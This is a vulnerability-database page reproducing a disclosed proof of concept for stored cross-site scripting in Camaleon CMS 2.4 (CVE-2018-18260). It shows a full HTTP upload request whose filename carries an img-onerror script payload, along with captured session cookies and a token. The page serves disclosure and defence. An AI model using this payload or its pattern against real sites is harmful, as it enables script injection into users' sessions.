Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormIsmail TasdelenPACKETSTORM:149772
HistoryOct 12, 2018 - 12:00 a.m.

CAMALEON CMS 2.4 Cross Site Scripting

2018-10-1200:00:00
Ismail Tasdelen
packetstormsecurity.com
282

EPSS

0.001

Percentile

26.5%

JSON
`# Exploit Title: CAMALEON CMS 2.4 - Cross-Site Scripting  
# Date: 2018-10-11   
# Exploit Author: Ismail Tasdelen  
# Vendor Homepage: http://camaleon.tuzitio.com/  
# Software Link : https://github.com/owen2345/camaleon-cms  
# Software : CAMALEON CMS  
# Version : 2.4  
# Vulernability Type : Cross-site Scripting  
# Vulenrability : Stored XSS  
# CVE : CVE-2018-18260  
  
# HTTP POST Request :  
  
POST /admin/media/upload?actions=false HTTP/1.1  
Host: demo-7728.tuzitio.com  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://demo-7728.tuzitio.com/admin/profile/edit  
X-CSRF-Token: D4mT8cg18Rxhpi7fYr9kRRvdCn2dSZXJMbbFeyOynVVMa3aD1pbIXDebhV3B2YwRttvYyoRLRWNf5gGlqX6fNw==  
X-Requested-With: XMLHttpRequest  
Content-Length: 1575324  
Content-Type: multipart/form-data; boundary=---------------------------85707368319206533892056530265  
Cookie: _ga=GA1.2.1784268591.1539231194; _gid=GA1.2.1333106602.1539231194; _tuzitio2_session=RHhIbzhHZTlERjFnM3ZUOTFzMnE5c295TCtVQ0QrUmttVGpCZnljaS9ibVM4UE9Ma0VDR2ppcnQzdlNPZFNobUsxdFhNSER4Z3JXYlBxN3VZcTNEbWRXS0ZldERyLzYyQ3d0S3hwSjhzWjBUMHJmaU1WeEt6MDB2QlQ0S0xkbGhUdkNwUHIrRS81ekJ3T2NnOUdnVXB5KzhPS1BnczNvaUtia2x6bmE3N2pzckRPaWI2Skc1RGhJWnZMbERRREZCSXpkU3pxdTMrRlk5WG5XYUMydk9xb1NRY2lzeWt2TWpwVjNodXJNOHFDZG9yczZXVkFMMXU2KzBZSTVqUGNkcDdjV3dBbmFuOVF3Z3BRRlFLcjFtcjVhK3hpak51VUFScVg3czQ0Z2xoOTg9LS1rczBEeWJsaDJPRkhwaTU3UHFSa2h3PT0%3D--f896a698dc0ad774de6bc953d2b9e460e916300f; auth_token=2ysW1sleUvjMJnzIqwlXag&Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A60.0%29+Gecko%2F20100101+Firefox%2F60.0&176.41.2.45  
Connection: close  
  
-----------------------------85707368319206533892056530265  
Content-Disposition: form-data; name="file_upload"; filename="\"><img src=x onerror=alert(\"ismailtasdelen\")>.jpg"  
Content-Type: image/jpeg  
`

Related

prion 1
github 1
rubygems 1
cvelist 1
nvd 1
zdt 1
veracode 1
osv 1
cve 1
prion
prion
Cross site scripting
2018-10-15 19:29:00
github
github
Camaleon CMS vulnerable to Stored Cross-site Scripting
2022-05-13 01:05:37
rubygems
rubygems
Camaleon CMS vulnerable to Stored Cross-site Scripting
2022-05-12 21:00:00
cvelist
cvelist
CVE-2018-18260
2018-10-15 00:00:00
nvd
nvd
CVE-2018-18260
2018-10-15 19:29:02
zdt
zdt
CAMALEON CMS 2.4 Cross Site Scripting Vulnerability
2018-10-12 00:00:00
veracode
veracode
Cross-Site Scripting (XSS)
2018-10-15 05:38:12
osv
osv
Camaleon CMS vulnerable to Stored Cross-site Scripting
2022-05-13 01:05:37
cve
cve
CVE-2018-18260
2018-10-15 19:29:02

EPSS

0.001

Percentile

26.5%

JSON
Related for PACKETSTORM:149772
prion1github1rubygems1cvelist1nvd1zdt1veracode1osv1cve1